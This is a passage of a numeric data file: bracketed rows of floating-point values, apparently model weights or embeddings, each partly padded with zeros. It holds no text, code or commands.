0.254027, 0.037225, 0.00104256, -0.258186, -0.087472, 0.00112173, 0.149587, 0.0185585, 0.0141074, -0.00217506, 0.00086563, -0.0916727, -0.62379, -0.00689335, -0.134756, -0.00678465, -0.0319778, 0.291578, -0.00228568, -0.00489068, -0.00497504, 0.00940699, -0.166916, -1.06968, 0.022661, -0.116812, -0.0051332, -0.00564019, 0.00395107, 0.00685955, -0.00241078, -0.698923, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0464698, 0.551384, 0.359815, -0.0802145, 0.590648, -0.544443, -0.258539, -0.0757818, -0.100089, 0.10477, -0.0172885, 0.457878, -0.0719607, 0.0177946, -0.0434758, 0.223453, -0.00939962, -0.0417517, 0.062425, 0.139215, 0.0918371, 0.294694, -0.00155919, 0.0686586, 0.235412, 0.300194, 0.117378, 0.101722, 0.0215695, 0.0754137, -0.0372671, -0.14075, -0.0285702, -0.402149, 0.121631, 0.401498, 0.065618, -0.0992043, -0.493367, -0.0647903, 0.162078, 0.468058, -0.116267, 0.280276, 0.0721641, -0.044723, -0.116642, -0.0952337, -0.0464884, -0.0836464, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.08128, -0.137468, -0.12353, -0.125097, 0.00140105, 0.087726, -0.0320484, -0.00170595, -0.0544409, -0.223793, 0.0122243, -0.929621, -1.24647, -0.309245, 0.0474166, -1.32751, -6.433e-05, -0.170624, 0.0211212, 0.0144147, 0.00671299, 0.0526034, -0.23638, -1.46575, 0.0233889, -0.31179, -0.0429232, -0.156514, -0.0309423, 0.0578041, -1.09441, -0.98948, -0.196286, -3.69479, -0.348959, 0.188367, -0.656161, -0.350601, 0.0150148, -0.00113288, -0.0536714, 0.168375, 0.198499, -0.193734, -0.0868963, -0.0675486, -3.21326, -0.0310835, -0.136594, 0.19506, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.989711, 4.07426, 1.8658, -1.90335, -3.88138, -1.00835, 0.0743546, 1.67867, -0.405826, 0.549189, -1.43028, 1.09834, 1.09241, -0.238799, 1.16438, 0.838383, 0.387961, -0.00198516, 0.533524, -1.38739, -0.628068, -0.719694, 1.68559, -0.964383, 1.43471, 2.0574, -0.90539, -0.590972, 0.442365, -0.330477, 2.18317, -0.0747921, -0.0645806, -1.46574, 1.97434, 1.9584, -0.166371, 0.184573, 1.01046, -0.394545, -0.473841, 2.72712, 0.386137, -2.13301, -0.826713, -1.38244, -1.30081, -0.172912, 1.2186, -4.9439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.297066, 0.614013, 0.0177407, 0.0946948, 0.28738, 0.0904941, 0.653066, 0.0230192, -0.0617862, 0.0045406, -0.176717, 0.792746, -0.0490113, -0.0641461, -0.0437274, 0.0526887, 0.0752672, 0.0177165, -0.464038, -0.834514, -0.262235, 0.00675418, 0.321562, -0.126896, 0.0128644, 0.23622, 0.166828, 0.152963, -0.146779, 0.108485, -0.0398573, -0.240074, -0.137627, -0.349488, 0.196025, 0.358787, -0.169672, -0.0818495, 0.173637, -0.0267539, -0.0784468, 0.00424027, -0.281483, 0.470937, 0.0616303, -0.00452246, -0.391235, 0.0678407, -0.0629347, 0.0644863, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.557517, -0.173367, 0.0392317, 0.0217549, -0.108408, 0.0525476, -1.41054, -0.00109867, -0.0286282, 0.0367939, -0.0341302, -0.004493, 0.0693375, -0.00783904, -0.00510357, -0.0439498, -0.050322, -0.0520081, -0.0350051, 
0.178303, 0.010006, 0.0199975, -0.0954596, -0.0154273, 0.0857445, -0.105056, -0.113937, -0.146062, 0.0234869, 0.0169509, 0.0983037, 0.00101986, 0.00210366, -3.32019, -0.203053, 0.110608, -0.168485, -0.0609527, 0.0580966, -0.0133487, -0.00244754, 0.118568, -1.70434, -4.30372, -0.0354869, -0.106948, -0.177703, -0.00765853, 0.0131175, 0.0275693, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0204695, 0.0223643, -0.0243812, 0.0146298, -0.0415361, 0.00820518, -0.00892246, 0.031723, 0.00554882, -0.00877494, -0.0548525, 0.0274748, -0.0221081, 0.00906296, -0.0114823, -0.0465796, -0.043575, 0.0199864, -0.0331047, 0.0471855, -0.0046006, -0.0284358, 0.0156292, 0.0207335, 0.0124492, -0.0432942, 0.018417, 0.016235, -0.0274217, -0.0301965, 0.017551, -0.00925177, -0.0156196, -0.0267814, 0.0185272, 0.0358673, -0.00946765, 0.0324075, -0.0584109, -0.0249332, -0.0315923, -0.0184504, -0.0236654, -0.00649219, -0.034787, -0.0222095, 0.010535, 0.00756894, -0.00014684, -0.0362273, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.106109, 1.29134, 1.76848, 0.0430765, -3.86096, -0.163331, 0.133054, -0.237161, -0.29743, -0.470672, -0.222604, 0.135846, 1.2505, 0.424474, -0.299868, 0.362121, -0.147281, -2.40455, 1.10839, -0.694552, 0.158308, -0.0146809, 0.94023, 0.230274, -1.99997, -1.17152, 0.739364, -0.264069, 0.0887211, -0.130809, -0.399161, 2.56588, 0.188564, -0.610672, 0.171534, 0.271985, -0.212644, -4.35062, -0.305392, -0.00750207, -0.0845502, 0.546064, 1.02345, 0.174517, -0.696105, -0.0698052, 0.829527, -0.61017, 0.292604, -0.604097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0247721, 0.0115411, -0.0797831, 0.159416, -4.32132, -1.28512, -0.426018, -0.586032, -0.0628205, -1.27192, 0.0084803, -0.160213, 0.00717192, 0.0129334, -0.0144258, -0.000514333, 0.0461299, -0.0291068, -0.0123271, 0.0619209, -0.266237, -0.0267065, 0.0105504, -0.451933, 0.0154839, -0.238927, -0.0814344, 0.0801853, -0.00908032, 0.00116715, 0.0493173, -0.283162, -0.849688, -2.54529, 0.0257275, -0.0227548, -0.00563317, -0.146518, -0.121448, -2.396, 0.0179936, 0.196952, -0.968114, -0.455727, 0.00459094, -0.0669994, -2.47361, -0.265842, -0.00906243, -0.928452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.139598, 1.06516, 0.490222, -2.17528, 3.12607, -1.036, -1.3677, -0.155669, -1.36504, -0.0577323, -1.46329, 0.322127, -0.344826, -0.53335, 1.38585, 0.972806, 0.130979, 0.34194, 0.437981, 1.19979, -1.57584, 1.13948, 0.355384, 0.203494, 0.249731, 0.193146, -0.0787124, 0.0893741, -1.13896, 0.295369, 0.189263, -0.14723, -0.212372, -0.428334, 0.233303, -0.910525, -0.970898, -0.4589, -1.75602, -0.53449, 0.664932, 2.32254, -0.981046, 1.99706, -2.2708, 0.0743042, 0.142296, -3.29678, -0.296859, 3.14083, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.825566, -0.699428, -0.326328, -1.77177, 0.277596, 0.55427, 0.812694, 0.0009358, -0.0111042, -0.041698, -0.08064, 0.654729, -0.22405, -0.227632, 0.332717, 0.166856, 0.122917, -0.177598, -2.78342, -0.557288, -1.39633, 0.05714, 
0.200463, 0.205907, 0.293394, 0.327247, -0.0336302, -0.0791815, -1.50883, 0.13902, 0.0402293, -1.08505, -0.145548, -0.346729, 0.192204, -0.352005, -0.574401, -0.0986989, 0.0846192, -0.125445, -0.194657, -0.176553, -0.358886, 0.692877, 0.153098, 0.0899646, -0.413342, 0.248388, -0.334103, 0.0739906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.229304, -0.0635595, -0.20567, -0.0351613, 0.0823049, -0.0156062, 0.702336, -0.035735, -0.134542, -0.172913, 0.0817171, -0.00846514, -0.00492361, 0.045652, -0.0190306, 0.161979, 0.0376816, 0.0219864, -0.160011, -0.316523, 0.00366427, 0.0715392, -0.0849684, 0.268497, 0.193233, -0.421774, -0.0202102, 0.136298, 0.00574725, -0.0829131, -0.0409926, -0.208146, 0.0551996, -0.128617, 0.0454432, 0.306461, -0.0103268, -0.0590751, 0.0201689, 0.0207485, 0.113161, 0.0990744, 0.093192, -0.0079823, -0.068022, 0.0670204, -0.0552199, -0.0787001, -0.00727348, -0.0662526, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0221196, -0.165367, 0.168003, 0.0421288, -1.21394, 0.0200251, -0.628962, -0.133426, 0.0167305, -0.271999, 0.0375864, -1.94173, 0.167646, 0.226119, 0.0542029, -0.0381861, -0.807648, -0.0495538, -0.537396, -0.0375613, 0.0166447, -6.54579, 0.356309, 0.00459758, -2.63437, 0.0316671, -0.0419871, -2.64972, -0.0239046, -0.0948108, -3.57081, 0.165673, -0.0510214, 0.0148107, 0.244074, 0.83031, -0.0140578, 0.00241112, -0.0357477, 0.033261, -0.109669, -0.752481, 0.0590674, -5.83187, -0.94036, 0.0656999, -0.200356, -0.0144436, -0.719037, -0.352492, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.57233, 0.119985, 0.347008, -0.0191082, -2.0265, -0.241659, 0.664611, -0.286581, -0.238326, 0.456413, -0.203139, 0.00386155, 0.173212, 0.0784512, -0.64412, 0.65571, -0.15062, 0.327121, -0.0142433, 0.0678225, 0.242918, -0.0326183, -0.107817, 0.142182, -0.135864, -0.100591, 0.154602, 0.312159, 0.182656, 0.00815216, 0.0247981, -1.06975, -0.0563178, -0.071549, 0.0988105, 0.633944, 0.258378, -0.666554, 0.0846051, 0.353507, 0.299379, 0.324931, 0.12114, 0.570172, 0.36714, -0.157905, 0.143912, -0.91729, -0.0504578, 1.1836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.509607, 0.544226, 0.0154673, -0.0145282, 0.184382, -0.0809191, -3.35228, -0.383576, 0.0871236, 0.0514583, -0.178609, 0.269001, 0.637278, -0.15748, -0.0782848, 0.0417276, -0.966654, -0.0821287, 0.361521, -0.280147, 0.0782106, 0.0188711, 0.364249, -0.0843884, 0.218902, 0.0267508, 0.0633992, 0.0573536, -0.00737519, -0.00915263, 0.0574642, 0.0947067, -0.031804, -0.0539626, 0.0212412, -0.461427, 0.0311155, -0.0580483, -0.204121, -0.134077, -0.122187, -0.899907, -0.106885, 0.030297, 0.00562229, -0.0719945, -0.0679367, -0.0271104, -0.0390149, -0.0215531, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.148583, -0.599085, -0.702443, -0.408774, -0.992477, -0.0329529, -2.58286, -0.18221, 0.0183569, -0.387911, 0.0675498, -1.34988, 0.275332, 0.250405, -0.292641, 0.0489432, -0.0473704, -0.0428604, 0.994747, -0.808518, -0.0651653, 0.348738, 0.00462446, 
-0.220226, 0.585267, -0.344758, 0.218215, -0.0156779, -0.281656, -0.864233, -2.14653, 0.419538, -0.0505128, 0.0609912, 0.195051, 0.258263, 0.0456483, -0.254889, -0.66936, 0.0805366, -0.321172, -0.032128, -0.114123, -0.139592, -0.122901, -0.0277908, 0.00417068, -0.0443716, -0.0890137, -1.16509, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.63073, -0.804304, 0.554447, 0.446609, 1.58161, -2.16981, -0.00259875, 1.16568, 0.745952, -2.19551, -0.27767, 0.301681, 0.891371, 0.133826, 0.4709, 0.851671, -0.178697, -0.376001, 0.114082, 0.0091106, -0.176273, -0.0810104, -1.45045, 0.343141, 0.820383, -0.76955, -0.31288, -1.23231, 0.0756924, -0.74313, -0.951857, -0.391796, -0.420542, -0.694005, -0.750038, 0.369718, -0.242508, -0.970563, 0.142606, -0.14363, -0.64627, -2.76156, -0.389172, -3.00937, -0.207266, -0.276476, -1.20257, 0.334938, -0.00625709, -3.06799, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.65606, -0.110162, 4.18359, 0.250344, -0.128001, 0.19731, 0.407368, -3.08367, -4.65131, -0.581463, 0.162585, 0.586748, -1.81408, 0.749374, 0.00160423, -0.929596, 1.61172, 1.25676, 2.28565, -0.0398001, 0.603038, -1.17999, 2.71755, -3.95836, -7.0118, -0.161352, -3.76965, 1.63827, 0.492433, -0.0876016, 0.79529, 2.47413, -3.14537, -3.82414, -0.971182, 0.377899, 1.2878, -4.01025, 4.67711, 0.326999, -0.981785, 3.08456, -4.8375, 5.27992, -0.175751, -0.754587, -17.062, -0.4209, -0.0943849, 2.11235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.845734, -3.7655, -2.96207, -1.05373, -1.77945, 0.0917443, -1.5631, 0.308609, -0.856501, 0.49879, 0.193344, 0.173346, -2.01154, 0.320383, -1.92578, 0.415064, 0.0893473, -0.846933, 0.607145, 0.00336761, -3.27119, 0.411603, -0.961912, -2.14449, 0.501403, -1.24208, 0.361509, -0.215189, -0.387603, -3.01823, -7.55608, -1.0651, -1.22019, 0.261776, 3.43727, 1.02511, 0.112977, -0.340476, -0.730456, 0.0116046, -0.625854, 0.832265, -1.56536, -4.67077, -0.559236, -0.226541, -1.13334, -0.462685, -1.11912, 0.906307, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.00651, -3.00287, 2.41322, -0.755737, 1.95889, 1.00442, -0.133361, -2.20772, -5.16304, 0.701445, -0.7886, -0.3747, -4.11133, 0.380228, -7.2239, 0.0115643, -0.115882, -1.30545, 1.09068, -1.23268, -0.0281065, 1.95347, -0.406534, -1.61877, -2.78562, -2.3923, -8.62198, 1.49202, 1.46068, 0.146353, -1.3459, 1.0416, 0.299185, -2.57638, 2.49094, -6.65705, -0.340465, -1.21372, -0.205729, 0.870291, -2.34177, 1.90094, -0.57773, -1.29747, -0.0268709, 0.558905, -1.23655, 0.160945, 0.459212, -0.167483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0494978, 0.380365, 0.311537, -0.0403161, 0.0266516, -0.0319796, 0.070417, 0.0334328, 0.092332, 0.00757947, -0.139858, 0.0945668, 0.153476, -0.00738589, -0.0372646, 0.199412, -0.0171761, -0.127785, 0.12603, -0.119354, 0.0284966, -0.195649, 0.279232, -0.0142558, 0.00198941, 0.249823, 0.09616, -0.0161666, 0.00788119, 0.0371048, -0.361013, -0.0524793, 0.0973183, -0.181518, -0.140221, 0.169871, 0.0274222, 
-0.0382272, 0.0927616, 0.0234133, 0.280618, -0.474918, 0.00851394, -0.174766, -0.0373201, 0.0115171, 0.0367524, 0.021381, -0.0788198, 0.0192415, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00796714, -1.73872, 0.302138, 0.0273523, -0.668215, 0.0270449, 0.620769, 0.11313, -0.0451071, 0.0761224, -0.0277418, -0.865348, -0.0580881, 0.0140428, 0.0447047, 0.152755, -0.0139794, 0.0219355, -0.19352, 0.381752, -0.0135727, 0.077933, 0.341853, -3.92433e-05, -0.398344, 0.168768, 0.201658, -0.0512623, 0.00142572, 0.0633812, -0.206113, -0.0441063, -0.0509791, -0.0487121, 0.122994, 0.160982, -0.00801197, -0.0288684, 0.0713987, 0.0172814, -0.0851666, -0.316498, -0.0744347, -0.223029, -0.0180281, -0.0963453, -1.15816, 0.0444255, 0.0531705, -0.103017, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.710425, 0.0589588, 0.200475, -0.030058, 0.542728, -0.191994, 0.394099, -0.136688, -0.0801518, 0.288179, -0.0730109, -0.00558507, 0.243835, 0.0529102, -0.365227, 0.397518, -0.475505, 0.142584, -0.0151283, 0.245332, 0.152183, -0.0735228, 0.112277, 0.0205124, -0.0720063, -0.1336, 0.0517994, 0.173052, 0.111022, 0.0165345, 0.0103496, -0.469609, -0.0323967, -0.0194593, 0.106448, -0.353901, 0.143677, -0.238162, 0.159108, 0.0689775, 0.10866, 0.351913, -0.0641982, 0.268825, 0.202058, -0.0814643, -0.00379322, -0.411356, 0.0126708, 0.56079, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], 
[-0.283984, 0.241602, 0.0244167, -0.0294464, -0.45401, 0.612081, 1.10344, -0.0975357, 0.0776575, -0.014049, 0.0506629, 1.10922, 0.269311, 0.0703949, -0.0164147, 0.225636, -0.0106372, 0.42862, 0.137219, -0.305646, -0.0198569, 0.0589249, -0.0879514, 0.0662081, 0.187428, 0.49754, -0.0166954, -0.233702, 0.012774, 0.0475872, -0.281638, -0.754977, 0.031546, -0.426795, 0.0827129, 1.4567, 0.0694925, -0.117242, 0.0794632, -0.0213157, 0.0125247, -0.107847, -0.0239133, -0.315095, -0.171907, 0.0486965, -0.0274579, 0.0293453, -0.0325373, -0.414609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0114592, 0.735028, -0.0564581, -0.172334, -0.495945, -0.0163565, 0.672066, -0.00162966, -0.596325, -0.0416657, 0.0461259, 1.10109, 0.102806, -0.0657672, 0.0904383, -0.211108, 0.143076, -0.214133, 0.2972, -0.152929, -0.00588315, 0.33539, 0.0239746, 0.00136893, 0.248577, -0.0206479, -0.00655068, -0.0588651, 0.149066, -0.457491, -0.349109, 0.0148945, 0.00449572, 0.00244004, 0.271325, -0.0623069, -0.0212814, 0.0137222, 0.0234307, -0.0201943, -0.143801, -0.106321, -0.0194373, -0.288683, 0.0618199, -0.0463239, -0.0121636, -0.0156882, -0.00548695, 0.0193332, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01988, -0.04047, -0.2776, 0.03925, 0.6035, 0.3599, -1.158, 0.0895, -0.01627, 0.6206, -1.259, 0.435, 0.4587, 0.149, 0.4106, 0.1788, -0.1173, 
0.1553, -0.003614, 0.09424, -0.265, -0.4688, -0.237, -0.537, -0.0563, 0.2329, -0.06125, 0.2888, -0.4653, 0.1321, -0.0728, -1.024, -0.03156, -0.10815, -0.1466, 1.543, -0.1022, -0.3484, -0.10864, 0.09174, 0.1188, -0.4907, 0.04874, 1.008, 0.329, -0.09607, 0.1888, -0.556, -0.321, -4.49], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12476, 0.0416, 0.0688, -0.05008, 0.3772, -0.01491, 0.6924, 0.07495, 0.1372, 0.0966, -0.0077, 0.691, 0.05185, 